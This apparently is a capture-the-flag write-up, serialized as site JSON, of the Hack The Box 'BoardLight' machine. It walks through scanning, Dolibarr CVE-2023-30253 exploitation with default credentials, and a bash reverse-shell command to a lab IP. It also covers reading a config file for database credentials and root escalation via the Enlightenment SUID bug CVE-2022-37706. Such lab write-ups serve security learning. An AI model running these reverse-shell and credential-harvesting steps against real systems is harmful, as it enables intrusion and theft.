[{"data":1,"prerenderedAt":554},["ShallowReactive",2],{"search":3,"recent-machines":28,"machine-\u002Fmachines\u002Fhtb-boardlight":35},[4,8,12,16,20,24],{"_path":5,"title":6,"image":7},"\u002Fmachines\u002Fhtb-boardlight","BoardLight","\u002Fimg\u002Fmachines\u002Fhtb-boardlight\u002Fcover.png",{"_path":9,"title":10,"image":11},"\u002Fmachines\u002Fhtb-headless","Headless","\u002Fimg\u002Fmachines\u002Fhtb-headless\u002Fcover.png",{"_path":13,"title":14,"image":15},"\u002Fmachines\u002Fhtb-usage","Usage","\u002Fimg\u002Fmachines\u002Fhtb-usage\u002Fcover.png",{"_path":17,"title":18,"image":19},"\u002Fmachines\u002Fthm-containment","ContAInment","\u002Fimg\u002Fmachines\u002Fthm-containment\u002Fcover.png",{"_path":21,"title":22,"image":23},"\u002Fprojects\u002Fmaddox","Maddox","\u002Fimg\u002Fprojects\u002Fmaddox\u002Fcover.png",{"_path":25,"title":26,"image":27},"\u002Fprojects\u002Fsentinel","Sentinel Password Manager","\u002Fimg\u002Fprojects\u002Fsentinel\u002Fcover.png",[29,31,33,34],{"_path":17,"title":18,"difficulty":30},"Medium",{"_path":13,"title":14,"difficulty":32},"Easy",{"_path":9,"title":10,"difficulty":32},{"_path":5,"title":6,"difficulty":32},{"_path":5,"_dir":36,"_draft":37,"_partial":37,"_locale":38,"title":6,"description":39,"difficulty":32,"platform":40,"os":41,"date":42,"image":7,"tags":43,"body":46,"_type":548,"_id":549,"_source":550,"_file":551,"_stem":552,"_extension":553},"machines",false,"","Easy Linux machine featuring Dolibarr CMS exploitation and SUID privilege escalation","HTB","Linux","2026-03-06",[40,41,32,44,45],"CVE","SUID",{"type":47,"children":48,"toc":541},"root",[49,58,64,114,119,145,151,164,177,232,252,258,270,283,342,354,360,365,385,411,417,422,463,482,487,525,535],{"type":50,"tag":51,"props":52,"children":54},"element","h2",{"id":53},"reconnaissance",[55],{"type":56,"value":57},"text","Reconnaissance",{"type":50,"tag":59,"props":60,"children":61},"p",{},[62],{"type":56,"value":63},"We start with a full port scan using nmap:",{"type":50,"tag":65,"props":66,"children":70},"pre",{"className":67,"code":68,"language":69,"meta":38,"style":38},"language-bash shiki shiki-themes github-dark","nmap -sC -sV -oN nmap\u002Finitial 10.10.11.11\n","bash",[71],{"type":50,"tag":72,"props":73,"children":74},"code",{"__ignoreMap":38},[75],{"type":50,"tag":76,"props":77,"children":80},"span",{"class":78,"line":79},"line",1,[81,87,93,98,103,109],{"type":50,"tag":76,"props":82,"children":84},{"style":83},"--shiki-default:#B392F0",[85],{"type":56,"value":86},"nmap",{"type":50,"tag":76,"props":88,"children":90},{"style":89},"--shiki-default:#79B8FF",[91],{"type":56,"value":92}," -sC",{"type":50,"tag":76,"props":94,"children":95},{"style":89},[96],{"type":56,"value":97}," -sV",{"type":50,"tag":76,"props":99,"children":100},{"style":89},[101],{"type":56,"value":102}," -oN",{"type":50,"tag":76,"props":104,"children":106},{"style":105},"--shiki-default:#9ECBFF",[107],{"type":56,"value":108}," nmap\u002Finitial",{"type":50,"tag":76,"props":110,"children":111},{"style":89},[112],{"type":56,"value":113}," 10.10.11.11\n",{"type":50,"tag":59,"props":115,"children":116},{},[117],{"type":56,"value":118},"The scan reveals two open ports:",{"type":50,"tag":120,"props":121,"children":122},"ul",{},[123,135],{"type":50,"tag":124,"props":125,"children":126},"li",{},[127,133],{"type":50,"tag":128,"props":129,"children":130},"strong",{},[131],{"type":56,"value":132},"Port 22",{"type":56,"value":134}," — SSH (OpenSSH 8.9p1)",{"type":50,"tag":124,"props":136,"children":137},{},[138,143],{"type":50,"tag":128,"props":139,"children":140},{},[141],{"type":56,"value":142},"Port 80",{"type":56,"value":144}," — HTTP (Apache 2.4.54)",{"type":50,"tag":51,"props":146,"children":148},{"id":147},"enumeration",[149],{"type":56,"value":150},"Enumeration",{"type":50,"tag":59,"props":152,"children":153},{},[154,156,162],{"type":56,"value":155},"Navigating to the web server on port 80, we find a corporate website for \"BoardLight\". Inspecting the page source reveals a hostname: ",{"type":50,"tag":72,"props":157,"children":159},{"className":158},[],[160],{"type":56,"value":161},"board.htb",{"type":56,"value":163},".",{"type":50,"tag":59,"props":165,"children":166},{},[167,169,175],{"type":56,"value":168},"After adding it to ",{"type":50,"tag":72,"props":170,"children":172},{"className":171},[],[173],{"type":56,"value":174},"\u002Fetc\u002Fhosts",{"type":56,"value":176},", we perform subdomain enumeration:",{"type":50,"tag":65,"props":178,"children":180},{"className":67,"code":179,"language":69,"meta":38,"style":38},"ffuf -u http:\u002F\u002Fboard.htb -H \"Host: FUZZ.board.htb\" -w \u002Fusr\u002Fshare\u002Fseclists\u002FDiscovery\u002FDNS\u002Fsubdomains-top1million-5000.txt -fw 6243\n",[181],{"type":50,"tag":72,"props":182,"children":183},{"__ignoreMap":38},[184],{"type":50,"tag":76,"props":185,"children":186},{"class":78,"line":79},[187,192,197,202,207,212,217,222,227],{"type":50,"tag":76,"props":188,"children":189},{"style":83},[190],{"type":56,"value":191},"ffuf",{"type":50,"tag":76,"props":193,"children":194},{"style":89},[195],{"type":56,"value":196}," -u",{"type":50,"tag":76,"props":198,"children":199},{"style":105},[200],{"type":56,"value":201}," http:\u002F\u002Fboard.htb",{"type":50,"tag":76,"props":203,"children":204},{"style":89},[205],{"type":56,"value":206}," -H",{"type":50,"tag":76,"props":208,"children":209},{"style":105},[210],{"type":56,"value":211}," \"Host: FUZZ.board.htb\"",{"type":50,"tag":76,"props":213,"children":214},{"style":89},[215],{"type":56,"value":216}," -w",{"type":50,"tag":76,"props":218,"children":219},{"style":105},[220],{"type":56,"value":221}," \u002Fusr\u002Fshare\u002Fseclists\u002FDiscovery\u002FDNS\u002Fsubdomains-top1million-5000.txt",{"type":50,"tag":76,"props":223,"children":224},{"style":89},[225],{"type":56,"value":226}," -fw",{"type":50,"tag":76,"props":228,"children":229},{"style":89},[230],{"type":56,"value":231}," 6243\n",{"type":50,"tag":59,"props":233,"children":234},{},[235,237,243,245,250],{"type":56,"value":236},"This discovers ",{"type":50,"tag":72,"props":238,"children":240},{"className":239},[],[241],{"type":56,"value":242},"crm.board.htb",{"type":56,"value":244},", which hosts a ",{"type":50,"tag":128,"props":246,"children":247},{},[248],{"type":56,"value":249},"Dolibarr 17.0.0",{"type":56,"value":251}," instance.",{"type":50,"tag":51,"props":253,"children":255},{"id":254},"foothold",[256],{"type":56,"value":257},"Foothold",{"type":50,"tag":59,"props":259,"children":260},{},[261,263,268],{"type":56,"value":262},"Dolibarr 17.0.0 is vulnerable to ",{"type":50,"tag":128,"props":264,"children":265},{},[266],{"type":56,"value":267},"CVE-2023-30253",{"type":56,"value":269}," — a PHP code injection vulnerability that allows remote code execution through the website pages editor.",{"type":50,"tag":59,"props":271,"children":272},{},[273,275,281],{"type":56,"value":274},"Default credentials ",{"type":50,"tag":72,"props":276,"children":278},{"className":277},[],[279],{"type":56,"value":280},"admin:admin",{"type":56,"value":282}," grant access to the admin panel. From there, we exploit the vulnerability:",{"type":50,"tag":65,"props":284,"children":286},{"className":67,"code":285,"language":69,"meta":38,"style":38},"python3 CVE-2023-30253.py --url http:\u002F\u002Fcrm.board.htb --login admin --password admin -c \"bash -i >& \u002Fdev\u002Ftcp\u002F10.10.14.5\u002F4444 0>&1\"\n",[287],{"type":50,"tag":72,"props":288,"children":289},{"__ignoreMap":38},[290],{"type":50,"tag":76,"props":291,"children":292},{"class":78,"line":79},[293,298,303,308,313,318,323,328,332,337],{"type":50,"tag":76,"props":294,"children":295},{"style":83},[296],{"type":56,"value":297},"python3",{"type":50,"tag":76,"props":299,"children":300},{"style":105},[301],{"type":56,"value":302}," CVE-2023-30253.py",{"type":50,"tag":76,"props":304,"children":305},{"style":89},[306],{"type":56,"value":307}," --url",{"type":50,"tag":76,"props":309,"children":310},{"style":105},[311],{"type":56,"value":312}," http:\u002F\u002Fcrm.board.htb",{"type":50,"tag":76,"props":314,"children":315},{"style":89},[316],{"type":56,"value":317}," --login",{"type":50,"tag":76,"props":319,"children":320},{"style":105},[321],{"type":56,"value":322}," admin",{"type":50,"tag":76,"props":324,"children":325},{"style":89},[326],{"type":56,"value":327}," --password",{"type":50,"tag":76,"props":329,"children":330},{"style":105},[331],{"type":56,"value":322},{"type":50,"tag":76,"props":333,"children":334},{"style":89},[335],{"type":56,"value":336}," -c",{"type":50,"tag":76,"props":338,"children":339},{"style":105},[340],{"type":56,"value":341}," \"bash -i >& \u002Fdev\u002Ftcp\u002F10.10.14.5\u002F4444 0>&1\"\n",{"type":50,"tag":59,"props":343,"children":344},{},[345,347,353],{"type":56,"value":346},"We catch a reverse shell as ",{"type":50,"tag":72,"props":348,"children":350},{"className":349},[],[351],{"type":56,"value":352},"www-data",{"type":56,"value":163},{"type":50,"tag":51,"props":355,"children":357},{"id":356},"lateral-movement",[358],{"type":56,"value":359},"Lateral Movement",{"type":50,"tag":59,"props":361,"children":362},{},[363],{"type":56,"value":364},"Checking the Dolibarr configuration file:",{"type":50,"tag":65,"props":366,"children":368},{"className":67,"code":367,"language":69,"meta":38,"style":38},"cat \u002Fvar\u002Fwww\u002Fhtml\u002Fcrm.board.htb\u002Fhtdocs\u002Fconf\u002Fconf.php\n",[369],{"type":50,"tag":72,"props":370,"children":371},{"__ignoreMap":38},[372],{"type":50,"tag":76,"props":373,"children":374},{"class":78,"line":79},[375,380],{"type":50,"tag":76,"props":376,"children":377},{"style":83},[378],{"type":56,"value":379},"cat",{"type":50,"tag":76,"props":381,"children":382},{"style":105},[383],{"type":56,"value":384}," \u002Fvar\u002Fwww\u002Fhtml\u002Fcrm.board.htb\u002Fhtdocs\u002Fconf\u002Fconf.php\n",{"type":50,"tag":59,"props":386,"children":387},{},[388,390,396,398,403,405,410],{"type":56,"value":389},"We find database credentials. Using them to query MySQL, we discover a password hash for user ",{"type":50,"tag":72,"props":391,"children":393},{"className":392},[],[394],{"type":56,"value":395},"larissa",{"type":56,"value":397},". After cracking it, we SSH in as ",{"type":50,"tag":72,"props":399,"children":401},{"className":400},[],[402],{"type":56,"value":395},{"type":56,"value":404}," and grab the ",{"type":50,"tag":128,"props":406,"children":407},{},[408],{"type":56,"value":409},"user flag",{"type":56,"value":163},{"type":50,"tag":51,"props":412,"children":414},{"id":413},"privilege-escalation",[415],{"type":56,"value":416},"Privilege Escalation",{"type":50,"tag":59,"props":418,"children":419},{},[420],{"type":56,"value":421},"Checking for SUID binaries:",{"type":50,"tag":65,"props":423,"children":425},{"className":67,"code":424,"language":69,"meta":38,"style":38},"find \u002F -perm -4000 2>\u002Fdev\u002Fnull\n",[426],{"type":50,"tag":72,"props":427,"children":428},{"__ignoreMap":38},[429],{"type":50,"tag":76,"props":430,"children":431},{"class":78,"line":79},[432,437,442,447,452,458],{"type":50,"tag":76,"props":433,"children":434},{"style":83},[435],{"type":56,"value":436},"find",{"type":50,"tag":76,"props":438,"children":439},{"style":105},[440],{"type":56,"value":441}," \u002F",{"type":50,"tag":76,"props":443,"children":444},{"style":89},[445],{"type":56,"value":446}," -perm",{"type":50,"tag":76,"props":448,"children":449},{"style":89},[450],{"type":56,"value":451}," -4000",{"type":50,"tag":76,"props":453,"children":455},{"style":454},"--shiki-default:#F97583",[456],{"type":56,"value":457}," 2>",{"type":50,"tag":76,"props":459,"children":460},{"style":105},[461],{"type":56,"value":462},"\u002Fdev\u002Fnull\n",{"type":50,"tag":59,"props":464,"children":465},{},[466,468,474,476,481],{"type":56,"value":467},"We find an unusual SUID binary: ",{"type":50,"tag":72,"props":469,"children":471},{"className":470},[],[472],{"type":56,"value":473},"\u002Fusr\u002Flib\u002Fx86_64-linux-gnu\u002Fenlightenment\u002Futils\u002Fenlightenment_sys",{"type":56,"value":475},". This binary is part of the Enlightenment desktop environment and is vulnerable to ",{"type":50,"tag":128,"props":477,"children":478},{},[479],{"type":56,"value":480},"CVE-2022-37706",{"type":56,"value":163},{"type":50,"tag":59,"props":483,"children":484},{},[485],{"type":56,"value":486},"Running the exploit gives us a root shell:",{"type":50,"tag":65,"props":488,"children":490},{"className":67,"code":489,"language":69,"meta":38,"style":38},"bash exploit.sh\nwhoami\n# root\n",[491],{"type":50,"tag":72,"props":492,"children":493},{"__ignoreMap":38},[494,506,515],{"type":50,"tag":76,"props":495,"children":496},{"class":78,"line":79},[497,501],{"type":50,"tag":76,"props":498,"children":499},{"style":83},[500],{"type":56,"value":69},{"type":50,"tag":76,"props":502,"children":503},{"style":105},[504],{"type":56,"value":505}," exploit.sh\n",{"type":50,"tag":76,"props":507,"children":509},{"class":78,"line":508},2,[510],{"type":50,"tag":76,"props":511,"children":512},{"style":83},[513],{"type":56,"value":514},"whoami\n",{"type":50,"tag":76,"props":516,"children":518},{"class":78,"line":517},3,[519],{"type":50,"tag":76,"props":520,"children":522},{"style":521},"--shiki-default:#6A737D",[523],{"type":56,"value":524},"# root\n",{"type":50,"tag":59,"props":526,"children":527},{},[528,533],{"type":50,"tag":128,"props":529,"children":530},{},[531],{"type":56,"value":532},"Root flag captured!",{"type":56,"value":534}," 🏴",{"type":50,"tag":536,"props":537,"children":538},"style",{},[539],{"type":56,"value":540},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":38,"searchDepth":508,"depth":508,"links":542},[543,544,545,546,547],{"id":53,"depth":508,"text":57},{"id":147,"depth":508,"text":150},{"id":254,"depth":508,"text":257},{"id":356,"depth":508,"text":359},{"id":413,"depth":508,"text":416},"markdown","content:machines:htb-boardlight.md","content","machines\u002Fhtb-boardlight.md","machines\u002Fhtb-boardlight","md",1777047342282]